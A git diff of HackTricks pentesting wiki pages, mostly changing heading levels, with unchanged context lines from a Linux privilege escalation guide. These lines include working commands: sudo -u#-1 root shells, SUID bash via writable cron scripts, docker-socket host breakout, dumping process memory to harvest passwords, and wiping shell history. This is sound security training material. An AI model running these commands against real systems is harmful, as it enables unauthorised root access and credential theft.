It works with smss.exe to manipulate use sessions: Logon/logoff, shell start, lock/unlock desktop...\
After W7 lsm.exe was transformed into a service (lsm.dll).\
There should only be 1 process in W7 and from them a service running the DLL.
-### services.exe
+## services.exe
This is the **Service Control Manager**.\
It **loads** **services** configured as **auto-start** and **drivers**.
@@ -69,7 +67,7 @@ Note how **some** **services** are going to be running in a **process of their o
There should only be 1 process.
-### lsass.exe
+## lsass.exe
This the **Local Security Authority Subsystem**.\
It's responsible for the user **authentication** and create the **security** **tokens**. It uses authentication packages located in `HKLM\System\CurrentControlSet\Control\Lsa`.\
@@ -77,7 +75,7 @@ It writes to the **Security** **event** **log**.\
There should only be 1 process.\
Keep in mind that this process is highly attacked to dump passwords.
-### svchost.exe
+## svchost.exe
This is the **Generic Service Host Process**.\
It hosts multiple DLL services in one shared process.\
@@ -89,18 +87,18 @@ If the **flag `-s`** is also used with an argument, then svchost is asked to **o
There will be several process of `svchost.exe`. If any of them is **not using the `-k` flag**, then thats very suspicious. If you find that **services.exe is not the parent**, thats also very suspicious.
-### taskhost.exe
+## taskhost.exe
This process act as host for processes run from DLLs. It loads the services that are run from DLLs.\
In W8 is called taskhostex.exe and in W10 taskhostw.exe.
-### explorer.exe
+## explorer.exe
This is the process responsible for the **user's desktop** and launching files via file extensions.\
**Only 1** process should be spawned **per logged on user.**\
This is run from **userinit.exe** which should be terminated, so **no parent** should appear for this process.
-## Catching Malicious Processes
+# Catching Malicious Processes
* Is it running from the expected path? (No Windows binaries run from temp location)
* Is it communicating with weird IPs?
diff --git a/getting-started-in-hacking.md b/getting-started-in-hacking.md
index 6cfe3dcf..6cfd0906 100644
--- a/getting-started-in-hacking.md
+++ b/getting-started-in-hacking.md
@@ -17,45 +17,43 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Getting Started in Hacking
+# Learning by Practice
-## Learning by Practice
-
-### [https://www.hackthebox.eu/](https://www.hackthebox.eu) & [https://academy.hackthebox.eu/catalogue](https://academy.hackthebox.eu/catalogue)
+## [https://www.hackthebox.eu/](https://www.hackthebox.eu) & [https://academy.hackthebox.eu/catalogue](https://academy.hackthebox.eu/catalogue)
Hackthebox has online machines to hack, it's the best place to learn by practicing. If you are new I would recommend you learning by doing retired machines following Ippsec videos.
HackTheBox academy is the new platform to learn hacking in a more guided way, also a great resource if you want to practice hacking some specific technology!
-### [https://tryhackme.com/](https://tryhackme.com)
+## [https://tryhackme.com/](https://tryhackme.com)
Tryhackme is a platform with virtual machines that need to be solved through walkthroughs, which is very good for beginners and normal CTFs where you self must hack into the machines.
-### [https://www.root-me.org/](https://www.root-me.org)
+## [https://www.root-me.org/](https://www.root-me.org)
Rootme is another page for online hosted virtual machines to hack.
-### [https://www.vulnhub.com/](https://www.vulnhub.com)
+## [https://www.vulnhub.com/](https://www.vulnhub.com)
Vulnhub has machines to download and then to hack
-### [https://hack.me/](https://hack.me)
+## [https://hack.me/](https://hack.me)
This site seems to be a community platform
-### [https://www.hacker101.com/](https://www.hacker101.com)
+## [https://www.hacker101.com/](https://www.hacker101.com)
free site with videos and CTFs
-### [https://crackmes.one/](https://crackmes.one)
+## [https://crackmes.one/](https://crackmes.one)
This site has a lot of binaries for forensic learning.
-### [https://www.hackthissite.org/missions/basic/](https://www.hackthissite.org/missions/basic/)
+## [https://www.hackthissite.org/missions/basic/](https://www.hackthissite.org/missions/basic/)
-### [https://attackdefense.com/](https://attackdefense.com)
+## [https://attackdefense.com/](https://attackdefense.com)
-### [https://portswigger.net/web-security/dashboard](https://portswigger.net/web-security/dashboard)
+## [https://portswigger.net/web-security/dashboard](https://portswigger.net/web-security/dashboard)
This website has a lot of web exploitation labs
diff --git a/interesting-http.md b/interesting-http.md
index adc9956b..687e0eae 100644
--- a/interesting-http.md
+++ b/interesting-http.md
@@ -17,17 +17,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Interesting HTTP
-
-## Referrer headers and policy
+# Referrer headers and policy
Referrer is the header used by browsers to indicate which was the previous page visited.
-### Sensitive information leaked
+## Sensitive information leaked
If at some point inside a web page any sensitive information is located on a GET request parameters, if the page contains links to external sources or an attacker is able to make/suggest (social engineering) the user visit a URL controlled by the attacker. It could be able to exfiltrate the sensitive information inside the latest GET request.
-### Mitigation
+## Mitigation
You can make the browser follow a **Referrer-policy** that could **avoid** the sensitive information to be sent to other web applications:
@@ -42,7 +40,7 @@ Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
```
-### Counter-Mitigation
+## Counter-Mitigation
You can override this rule using an HTML meta tag (the attacker needs to exploit and HTML injection):
@@ -51,7 +49,7 @@ You can override this rule using an HTML meta tag (the attacker needs to exploit
```
-### Defense
+## Defense
Never put any sensitive data inside GET parameters or paths in the URL.
diff --git a/linux-unix/linux-environment-variables.md b/linux-unix/linux-environment-variables.md
index 4b0c94ed..70224cd8 100644
--- a/linux-unix/linux-environment-variables.md
+++ b/linux-unix/linux-environment-variables.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Linux Environment Variables
-
-## Global variables
+# Global variables
The global variables **will be** inherited by **child processes**.
@@ -38,7 +36,7 @@ You can **remove** a variable doing:
unset MYGLOBAL
```
-## Local variables
+# Local variables
The **local variables** can only be **accessed** by the **current shell/script**.
@@ -48,7 +46,7 @@ echo $LOCAL
unset LOCAL
```
-## List current variables
+# List current variables
```bash
set
@@ -58,9 +56,9 @@ cat /proc/$$/environ
cat /proc/`python -c "import os; print(os.getppid())"`/environ
```
-## Persistent Environment variables
+# Persistent Environment variables
-#### **Files that affect behavior of every user:**
+### **Files that affect behavior of every user:**
* _**/etc/bash.bashrc**_: This file is read whenever an interactive shell is started (normal terminal) and all the commands specified in here are executed.
* _**/etc/profile and /etc/profile.d/\***_**:** This file is read every time a user logs in. Thus all the commands executed in here will execute only once at the time of user logging in.
@@ -74,14 +72,14 @@ cat /proc/`python -c "import os; print(os.getppid())"`/environ
export $TEST
```
-#### **Files that affect behavior for only a specific user:**
+### **Files that affect behavior for only a specific user:**
* _**\~/.bashrc**_: This file behaves the same way _/etc/bash.bashrc_ file works but it is executed only for a specific user. If you want to create an environment for yourself go ahead and modify or create this file in your home directory.
* _**\~/.profile, \~/.bash\_profile, \~/.bash\_login**_**:** These files are same as _/etc/profile_. The difference comes in the way it is executed. This file is executed only when a user in whose home directory this file exists, logs in.
**Extracted from:** [**here**](https://codeburst.io/linux-environment-variables-53cea0245dc9) **and** [**here**](https://www.gnu.org/software/bash/manual/html\_node/Bash-Startup-Files.html)
-## Common variables
+# Common variables
From: [https://geek-university.com/linux/common-environment-variables/](https://geek-university.com/linux/common-environment-variables/)
@@ -103,9 +101,9 @@ From: [https://geek-university.com/linux/common-environment-variables/](https://
* **TZ** – your time zone.
* **USER** – your current username.
-## Interesting variables for hacking
+# Interesting variables for hacking
-### **HISTFILESIZE**
+## **HISTFILESIZE**
Change the **value of this variable to 0**, so when you **end your session** the **history file** (\~/.bash\_history) **will be deleted**.
@@ -113,7 +111,7 @@ Change the **value of this variable to 0**, so when you **end your session** the
export HISTFILESIZE=0
```
-### **HISTSIZE**
+## **HISTSIZE**
Change the **value of this variable to 0**, so when you **end your session** any command will be added to the **history file** (\~/.bash\_history).
@@ -121,7 +119,7 @@ Change the **value of this variable to 0**, so when you **end your session** any
export HISTSIZE=0
```
-### http\_proxy
+## http\_proxy
The processes will use the **proxy** declared here to connect to internet through **http**.
@@ -129,7 +127,7 @@ The processes will use the **proxy** declared here to connect to internet throug
export http_proxy="http://10.10.10.10:8080"
```
-### https\_proxy
+## https\_proxy
The processes will use the **proxy** declared here to connect to internet through **https**.
@@ -137,7 +135,7 @@ The processes will use the **proxy** declared here to connect to internet throug
export https_proxy="http://10.10.10.10:8080"
```
-### PS1
+## PS1
Change how your prompt looks.
diff --git a/linux-unix/linux-privilege-escalation-checklist.md b/linux-unix/linux-privilege-escalation-checklist.md
index 38fd00a6..382912f3 100644
--- a/linux-unix/linux-privilege-escalation-checklist.md
+++ b/linux-unix/linux-privilege-escalation-checklist.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Checklist - Linux Privilege Escalation
-
{% hint style="warning" %}
**Support HackTricks and get benefits!**
@@ -34,9 +32,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
{% endhint %}
-### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
+## **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
-### [System Information](privilege-escalation/#system-information)
+## [System Information](privilege-escalation/#system-information)
* [ ] Get **OS information**
* [ ] Check the [**PATH**](privilege-escalation/#path), any **writable folder**?
@@ -47,18 +45,18 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [ ] More system enum ([date, system stats, cpu info, printers](privilege-escalation/#more-system-enumeration))
* [ ] [Enumerate more defenses](privilege-escalation/#enumerate-possible-defenses)
-### [Drives](privilege-escalation/#drives)
+## [Drives](privilege-escalation/#drives)
* [ ] **List mounted** drives
* [ ] **Any unmounted drive?**
* [ ] **Any creds in fstab?**
-### [**Installed Software**](privilege-escalation/#installed-software)
+## [**Installed Software**](privilege-escalation/#installed-software)
* [ ] **Check for**[ **useful software**](privilege-escalation/#useful-software) **installed**
* [ ] **Check for** [**vulnerable software**](privilege-escalation/#vulnerable-software-installed) **installed**
-### [Processes](privilege-escalation/#processes)
+## [Processes](privilege-escalation/#processes)
* [ ] Is any **unknown software running**?
* [ ] Is any software with **more privileges that it should have running**?
@@ -67,40 +65,40 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [ ] **Monitor processes** and check if any interesting process is running frequently
* [ ] Can you **read** some interesting **process memory** (where passwords could be saved)?
-### [Scheduled/Cron jobs?](privilege-escalation/#scheduled-jobs)
+## [Scheduled/Cron jobs?](privilege-escalation/#scheduled-jobs)
* [ ] Is the [**PATH** ](privilege-escalation/#cron-path)being modified by some cron and you can **write** in it?
* [ ] Any [**wildcard** ](privilege-escalation/#cron-using-a-script-with-a-wildcard-wildcard-injection)in a cron job?
* [ ] Some [**modifiable script** ](privilege-escalation/#cron-script-overwriting-and-symlink)is being **executed** or is inside **modifiable folder**?
* [ ] Have you detected that some **script** could be being [**executed** very **frequently**](privilege-escalation/#frequent-cron-jobs)? (every 1, 2 or 5 minutes)
-### [Services](privilege-escalation/#services)
+## [Services](privilege-escalation/#services)
* [ ] Any **writable .service** file?
* [ ] Any **writable binary** executed by a **service**?
* [ ] Any **writable folder in systemd PATH**?
-### [Timers](privilege-escalation/#timers)
+## [Timers](privilege-escalation/#timers)
* [ ] Any **writable timer**?
-### [Sockets](privilege-escalation/#sockets)
+## [Sockets](privilege-escalation/#sockets)
* [ ] Any **writable .socket** file?
* [ ] Can you **communicate with any socket**?
* [ ] **HTTP sockets** with interesting info?
-### [D-Bus](privilege-escalation/#d-bus)
+## [D-Bus](privilege-escalation/#d-bus)
* [ ] Can you **communicate with any D-Bus**?
-### [Network](privilege-escalation/#network)
+## [Network](privilege-escalation/#network)
* [ ] Enumerate the network to know where you are
* [ ] **Open ports you couldn't access before** getting a shell inside the machine?
* [ ] Can you **sniff traffic** using `tcpdump`?
-### [Users](privilege-escalation/#users)
+## [Users](privilege-escalation/#users)
* [ ] Generic users/groups **enumeration**
* [ ] Do you have a **very big UID**? Is the **machine** **vulnerable**?
@@ -109,11 +107,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [ ] Password Policy?
* [ ] Try to **use** every **known password** that you have discovered previously to login **with each** possible **user**. Try to login also without password.
-### [Writable PATH](privilege-escalation/#writable-path-abuses)
+## [Writable PATH](privilege-escalation/#writable-path-abuses)
* [ ] If you have **write privileges over some folder in PATH** you may be able to escalate privileges
-### [SUDO and SUID commands](privilege-escalation/#sudo-and-suid)
+## [SUDO and SUID commands](privilege-escalation/#sudo-and-suid)
* [ ] Can you execute **any comand with sudo**? Can you use it to READ, WRITE or EXECUTE anything as root? ([**GTFOBins**](https://gtfobins.github.io))
* [ ] Is any **exploitable suid binary**? ([**GTFOBins**](https://gtfobins.github.io))
@@ -127,25 +125,25 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [ ] Can you [**modify /etc/ld.so.conf.d/**](privilege-escalation/#etc-ld-so-conf-d)?
* [ ] [**OpenBSD DOAS**](privilege-escalation/#doas) command
-### [Capabilities](privilege-escalation/#capabilities)
+## [Capabilities](privilege-escalation/#capabilities)
* [ ] Has any binary any **unexpected capability**?
-### [ACLs](privilege-escalation/#acls)
+## [ACLs](privilege-escalation/#acls)
* [ ] Has any file any **unexpected ACL**?
-### [Open Shell sessions](privilege-escalation/#open-shell-sessions)
+## [Open Shell sessions](privilege-escalation/#open-shell-sessions)
* [ ] **screen**
* [ ] **tmux**
-### [SSH](privilege-escalation/#ssh)
+## [SSH](privilege-escalation/#ssh)
* [ ] **Debian** [**OpenSSL Predictable PRNG - CVE-2008-0166**](privilege-escalation/#debian-openssl-predictable-prng-cve-2008-0166)
* [ ] [**SSH Interesting configuration values**](privilege-escalation/#ssh-interesting-configuration-values)
-### [Interesting Files](privilege-escalation/#interesting-files)
+## [Interesting Files](privilege-escalation/#interesting-files)
* [ ] **Profile files** - Read sensitive data? Write to privesc?
* [ ] **passwd/shadow files** - Read sensitive data? Write to privesc?
@@ -160,14 +158,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [ ] **Known files that contains passwords**: Use **Linpeas** and **LaZagne**
* [ ] **Generic search**
-### [**Writable Files**](privilege-escalation/#writable-files)
+## [**Writable Files**](privilege-escalation/#writable-files)
* [ ] **Modify python library** to execute arbitrary commands?
* [ ] Can you **modify log files**? **Logtotten** exploit
* [ ] Can you **modify /etc/sysconfig/network-scripts/**? Centos/Redhat exploit
* [ ] Can you [**write in ini, int.d, systemd or rc.d files**](privilege-escalation/#init-init-d-systemd-and-rc-d)?
-### [**Other tricks**](privilege-escalation/#other-tricks)
+## [**Other tricks**](privilege-escalation/#other-tricks)
* [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
diff --git a/linux-unix/privilege-escalation/README.md b/linux-unix/privilege-escalation/README.md
index 25d10711..979377e9 100644
--- a/linux-unix/privilege-escalation/README.md
+++ b/linux-unix/privilege-escalation/README.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# System Information
-
-## OS info
+# OS info
Let's starting gaining some knowledge of the OS running
@@ -29,7 +27,7 @@ lsb_release -a 2>/dev/null # old, not by default on many systems
cat /etc/os-release 2>/dev/null # universal on modern systems
```
-## Path
+# Path
If you **have write permissions on any folder inside the `PATH`** variable you may be able to hijacking some libraries or binaries:
@@ -37,7 +35,7 @@ If you **have write permissions on any folder inside the `PATH`** variable you m
echo $PATH
```
-## Env info
+# Env info
Interesting information, passwords or API keys in the environment variables?
@@ -45,7 +43,7 @@ Interesting information, passwords or API keys in the environment variables?
(env || set) 2>/dev/null
```
-## Kernel exploits
+# Kernel exploits
Check the kernel version and if there is some exploit that can be used to escalate privileges
@@ -72,7 +70,7 @@ Tools that could help searching for kernel exploits are:
Always **search the kernel version in Google**, maybe your kernel version is wrote in some kernel exploit and then you will be sure that this exploit is valid.
-## CVE-2016-5195 (DirtyCow)
+# CVE-2016-5195 (DirtyCow)
Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
@@ -84,7 +82,7 @@ https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c
```
-## Sudo version
+# Sudo version
Based on the vulnerable sudo versions that appear in:
@@ -98,7 +96,7 @@ You can check if the sudo version is vulnerable using this grep.
sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"
```
-## sudo < v1.28
+# sudo < v1.28
From @sickrov
@@ -106,7 +104,7 @@ From @sickrov
sudo -u#-1 /bin/bash
```
-## Dmesg signature verification failed
+# Dmesg signature verification failed
Check **smasher2 box of HTB** for an **example** of how this vuln could be exploited
@@ -114,7 +112,7 @@ Check **smasher2 box of HTB** for an **example** of how this vuln could be explo
dmesg 2>/dev/null | grep "signature"
```
-## More system enumeration
+# More system enumeration
```bash
date 2>/dev/null #Date
@@ -123,9 +121,9 @@ lscpu #CPU info
lpstat -a 2>/dev/null #Printers info
```
-## Enumerate possible defenses
+# Enumerate possible defenses
-### AppArmor
+## AppArmor
```bash
if [ `which aa-status 2>/dev/null` ]; then
@@ -139,38 +137,38 @@ if [ `which aa-status 2>/dev/null` ]; then
fi
```
-### Grsecurity
+## Grsecurity
```bash
((uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo "Not found grsecurity")
```
-### PaX
+## PaX
```bash
(which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo "Not found PaX")
```
-### Execshield
+## Execshield
```bash
(grep "exec-shield" /etc/sysctl.conf || echo "Not found Execshield")
```
-### SElinux
+## SElinux
```bash
(sestatus 2>/dev/null || echo "Not found sestatus")
```
-### ASLR
+## ASLR
```bash
cat /proc/sys/kernel/randomize_va_space 2>/dev/null
#If 0, not enabled
```
-## Docker Breakout
+# Docker Breakout
If you are inside a docker container you can try to escape from it:
@@ -191,7 +189,7 @@ grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc
# Installed Software
-## Useful software
+# Useful software
Enumerate useful binaries
@@ -205,7 +203,7 @@ Also, check if **any compiler is installed**. This is useful if you need to use
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")
```
-## Vulnerable Software Installed
+# Vulnerable Software Installed
Check for the **version of the installed packages and services**. Maybe there is some old Nagios version (for example) that could be exploited for escalating privileges…\
It is recommended to check manually the version of the more suspicious installed software.
@@ -234,11 +232,11 @@ top -n 1
Always check for possible [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** detect those by checking the `--inspect` parameter inside the command line of the process.\
Also **check your privileges over the processes binaries**, maybe you can overwrite someone.
-## Process monitoring
+# Process monitoring
You can use tools like [**pspy**](https://github.com/DominicBreuker/pspy) to monitor processes. This can be very useful to identify vulnerable processes being executed frequently or when a set of requirements are met.
-## Process memory
+# Process memory
Some services of a server save **credentials in clear text inside the memory**.\
Normally you will need **root privileges** to read the memory of processes that belong to other users, therefore this is usually more useful when you are already root and want to discover more credentials.\
@@ -255,7 +253,7 @@ The file _**/proc/sys/kernel/yama/ptrace\_scope**_ controls the accessibility of
* **kernel.yama.ptrace\_scope = 3**: No processes may be traced with ptrace. Once set, a reboot is needed to enable ptracing again.
{% endhint %}
-### GDB
+## GDB
If you have access to the memory of a FTP service (for example) you could get the Heap and search inside of it the credentials.
@@ -268,7 +266,7 @@ gdb -p
strings /tmp/mem_ftp #User and password
```
-### GDB Script
+## GDB Script
{% code title="dump-memory.sh" %}
```bash
@@ -283,7 +281,7 @@ done
```
{% endcode %}
-### /proc/$pid/maps & /proc/$pid/mem
+## /proc/$pid/maps & /proc/$pid/mem
For a given process ID, **maps shows how memory is mapped within that processes'** virtual address space; it also shows the **permissions of each mapped region**. The **mem** pseudo file **exposes the processes memory itself**. From the **maps** file we know which **memory regions are readable** and their offsets. We use this information to **seek into the mem file and dump all readable regions** to a file.
@@ -300,7 +298,7 @@ procdump()
)
```
-### /dev/mem
+## /dev/mem
`/dev/mem` provides access to the system's **physical** memory, not the virtual memory. The kernels virtual address space can be accessed using /dev/kmem.\
Typically, `/dev/mem` is only readable by **root** and **kmem** group.
@@ -309,7 +307,7 @@ Typically, `/dev/mem` is only readable by **root** and **kmem** group.
strings /dev/mem -n10 | grep -i PASS
```
-### ProcDump for linux
+## ProcDump for linux
ProcDump is a Linux reimagining of the classic ProcDump tool from the Sysinternals suite of tools for Windows. Get it in [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)
@@ -340,7 +338,7 @@ Press Ctrl-C to end monitoring without terminating the process.
[20:21:00 - INFO]: Core dump 0 generated: ./sleep_time_2021-11-03_20:20:58.1714
```
-### Tools
+## Tools
To dump a process memory you could use:
@@ -348,9 +346,9 @@ To dump a process memory you could use:
* [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - _You can manually remove root requirements and dump process owned by you_
* Script A.5 from [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) (root is required)
-## Credentials from Process Memory
+# Credentials from Process Memory
-### Manual example
+## Manual example
If you find that the authenticator process is running:
@@ -366,7 +364,7 @@ You can dump the process (see before sections to find different ways to dump the
strings *.dump | grep -i password
```
-### mimipenguin
+## mimipenguin
The tool [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) will **steal clear text credentials from memory** and from some **well known files**. It requires root privileges to work properly.
@@ -389,7 +387,7 @@ ls -al /etc/cron* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
```
-## Cron path
+# Cron path
For example, inside _/etc/crontab_ you can find the PATH: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_
@@ -404,7 +402,7 @@ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
/tmp/bash -p #The effective uid and gid to be set to the real uid and gid
```
-## Cron using a script with a wildcard (Wildcard Injection)
+# Cron using a script with a wildcard (Wildcard Injection)
If a script being executed by root has a “**\***” inside a command, you could exploit this to make unexpected things (like privesc). Example:
@@ -420,7 +418,7 @@ Read the following page for more wildcard exploitation tricks:
[wildcards-spare-tricks.md](wildcards-spare-tricks.md)
{% endcontent-ref %}
-## Cron script overwriting and symlink
+# Cron script overwriting and symlink
If you **can modify a cron script** executed by root, you can get a shell very easily:
@@ -436,7 +434,7 @@ If the script executed by root uses a **directory where you have full access**,
ln -d -s
```
-## Frequent cron jobs
+# Frequent cron jobs
You can monitor the processes to search for processes that are being executed every 1,2 or 5 minutes. Maybe you can take advantage of it and escalate privileges.
@@ -448,7 +446,7 @@ for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; do
**You can also use** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (this will monitor and list every process that start).
-## Invisible cron jobs
+# Invisible cron jobs
It's possible to create a cronjob **putting a carriage return after a comment** (without new line character), and the cron job will work. Example (note the carriege return char):
@@ -458,16 +456,16 @@ It's possible to create a cronjob **putting a carriage return after a comment**
# Services
-## Writable _.service_ files
+# Writable _.service_ files
Check if you can write any `.service` file, if you can, you **could modify it** so it **executes** your **backdoor when** the service is **started**, **restarted** or **stopped** (maybe you will need to wait until the machine is rebooted).\
For example create your backdoor inside the .service file with **`ExecStart=/tmp/script.sh`**
-## Writable service binaries
+# Writable service binaries
Keep in mid that if you have **write permissions over binaries being executed by services**, you can change them for backdoors so when the services get re-executed the backdoors will be executed.
-## systemd PATH - Relative Paths
+# systemd PATH - Relative Paths
You can see the PATH used by **systemd** with:
@@ -497,7 +495,7 @@ You can enumerate all the timers doing:
systemctl list-timers --all
```
-## Writable timers
+# Writable timers
If you can modify a timer you can make it execute some existent systemd.unit (like a `.service` or a `.target`)
@@ -516,7 +514,7 @@ Therefore, in order to abuse this permissions you would need to:
**Learn more about timers with `man systemd.timer`.**
-## **Enabling Timer**
+# **Enabling Timer**
In order to enable a timer you need root privileges and to execute:
@@ -541,22 +539,22 @@ Sockets can be configured using `.socket` files.
* `ExecStopPre`, `ExecStopPost`: Additional **commands** that are **executed before** or **after** the listening **sockets**/FIFOs are **closed** and removed, respectively.
* `Service`: Specifies the **service** unit name **to activate** on **incoming traffic**. This setting is only allowed for sockets with Accept=no. It defaults to the service that bears the same name as the socket (with the suffix replaced). In most cases, it should not be necessary to use this option.
-## Writable .socket files
+# Writable .socket files
If you find a **writable** `.socket` file you can **add** at the beginning of the `[Socket]` section something like: `ExecStartPre=/home/kali/sys/backdoor` and the backdoor will be executed before the socket is created. Therefore, you will **probably need to wait until the machine is rebooted.**\
_Note that the system must be using that socket file configuration or the backdoor won't be executed_
-## Writable sockets
+# Writable sockets
If you **identify any writable socket** (_now where are talking about Unix Sockets, not about the config `.socket` files_), then, **you can communicate** with that socket and maybe exploit a vulnerability.
-## Enumerate Unix Sockets
+# Enumerate Unix Sockets
```bash
netstat -a -p --unix
```
-## Raw connection
+# Raw connection
```bash
#apt-get install netcat-openbsd
@@ -573,7 +571,7 @@ socat - UNIX-CLIENT:/dev/socket #connect to UNIX-domain socket, irrespective of
[socket-command-injection.md](socket-command-injection.md)
{% endcontent-ref %}
-## HTTP sockets
+# HTTP sockets
Note that there may be some **sockets listening for HTTP** requests (_I'm not talking about .socket files but about the files acting as unix sockets_). You can check this with:
@@ -583,7 +581,7 @@ curl --max-time 2 --unix-socket /pat/to/socket/files http:/index
If the socket **respond with a HTTP** request, then you can **communicate** with it and maybe **exploit some vulnerability**.
-## Writable Docker Socket
+# Writable Docker Socket
The **docker socke**t is typically located at `/var/run/docker.sock` and is only writable by `root` user and `docker` group.\
If for some reason **you have write permissions** over that socket you can escalate privileges.\
@@ -594,7 +592,7 @@ docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bi
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
```
-### Use docker web API from socket without docker package
+## Use docker web API from socket without docker package
If you have access to **docker socket** but you can't use the docker binary (maybe it isn't even installed), you can use directly the web API with `curl`.
@@ -627,7 +625,7 @@ Upgrade: tcp
Now, you can execute commands on the container from this `socat` connection.
-### Others
+## Others
Note that if you have write permissions over the docker socket because you are **inside the group `docker`** you have [**more ways to escalate privileges**](interesting-groups-linux-pe/#docker-group). If the [**docker API is listening in a port** you can also be able to compromise it](../../pentesting/2375-pentesting-docker.md#compromising).
@@ -637,7 +635,7 @@ Check **more ways to break out from docker or abuse i to escalate privileges** i
[docker-breakout](docker-breakout/)
{% endcontent-ref %}
-## Containerd (ctr) privilege escalation
+# Containerd (ctr) privilege escalation
If you find that you can use the **`ctr`** command read the following page as **you may be able to abuse it to escalate privileges**:
@@ -645,7 +643,7 @@ If you find that you can use the **`ctr`** command read the following page as **
[containerd-ctr-privilege-escalation.md](containerd-ctr-privilege-escalation.md)
{% endcontent-ref %}
-## **RunC** privilege escalation
+# **RunC** privilege escalation
If you find that you can use the **`runc`** command read the following page as **you may be able to abuse it to escalate privileges**:
@@ -687,7 +685,7 @@ Policies to the context "default" affects everyone not affected by other policie
It's always interesting to enumerate the network and figure out the position of the machine.
-## Generic enumeration
+# Generic enumeration
```bash
#Hostname, hosts and DNS
@@ -712,7 +710,7 @@ cat /etc/networks
lsof -i
```
-## Open ports
+# Open ports
Always check network services running on the machine that you wasn't able to interact with before accessing to it:
@@ -721,7 +719,7 @@ Always check network services running on the machine that you wasn't able to int
(netstat -punta || ss --ntpu) | grep "127.0"
```
-## Sniffing
+# Sniffing
Check if you can sniff traffic. If you can, you could be able to grab some credentials.
@@ -731,7 +729,7 @@ timeout 1 tcpdump
# Users
-## Generic Enumeration
+# Generic Enumeration
Check **who** you are, which **privileges** do you have, which **users** are in the systems, which ones can **login** and which ones have **root privileges:**
@@ -757,12 +755,12 @@ for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null | so
gpg --list-keys 2>/dev/null
```
-## Big UID
+# Big UID
Some Linux versions were affected by a bug that allow users with **UID > INT\_MAX** to escalate privileges. More info: [here](https://gitlab.freedesktop.org/polkit/polkit/issues/74), [here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) and [here](https://twitter.com/paragonsec/status/1071152249529884674).\
**Exploit it** using: **`systemd-run -t /bin/bash`**
-## Groups
+# Groups
Check if you are a **member of some group** that could grant you root privileges:
@@ -770,7 +768,7 @@ Check if you are a **member of some group** that could grant you root privileges
[interesting-groups-linux-pe](interesting-groups-linux-pe/)
{% endcontent-ref %}
-## Clipboard
+# Clipboard
Check if anything interesting is located inside the clipboard (if possible)
@@ -785,24 +783,24 @@ if [ `which xclip 2>/dev/null` ]; then
fi
```
-## Password Policy
+# Password Policy
```bash
grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs
```
-## Known passwords
+# Known passwords
If you **know any password** of the environment **try to login as each user** using the password.
-## Su Brute
+# Su Brute
If don't mind about doing a lot of noise and `su` and `timeout` binaries are present on the computer you can try to brute-force user using [su-bruteforce](https://github.com/carlospolop/su-bruteforce).\
[**Linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) with `-a` parameter also try to brute-force users.
# Writable PATH abuses
-## $PATH
+# $PATH
